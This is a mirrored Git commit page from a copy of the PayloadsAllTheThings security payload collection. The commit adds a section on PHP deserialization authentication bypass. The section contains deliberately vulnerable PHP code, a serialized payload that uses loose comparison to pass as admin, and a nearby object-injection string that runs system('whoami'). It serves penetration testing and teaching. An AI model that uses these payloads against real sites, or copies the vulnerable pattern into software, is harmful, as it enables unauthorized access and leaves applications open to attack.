Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2025-12-06 17:02:53 +01:00
Code Issues Projects Releases Wiki Activity

add auth bypass

Browse source
This commit is contained in:
Alexandre ZANNI 2018-09-25 23:59:29 +02:00 committed by GitHub
parent 1a1a48c725
commit d49e40b1b2
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

23
PHP serialization/README.md
View file

@ -43,6 +43,29 @@ string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}
```
## Authentication bypass
Vulnerable code:
```php
<?php
$data = unserialize($_COOKIE['auth']);
if ($data['username'] == $adminName && $data['password'] == $adminPassword) {
$admin = true;
} else {
$admin = false;
}
```
Payload:
```
a:2:{s:8:"username";b:1;s:8:"password";b:1;}
```
Because `true == "str"` is true. Ref: [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
## Others exploits
Reverse Shell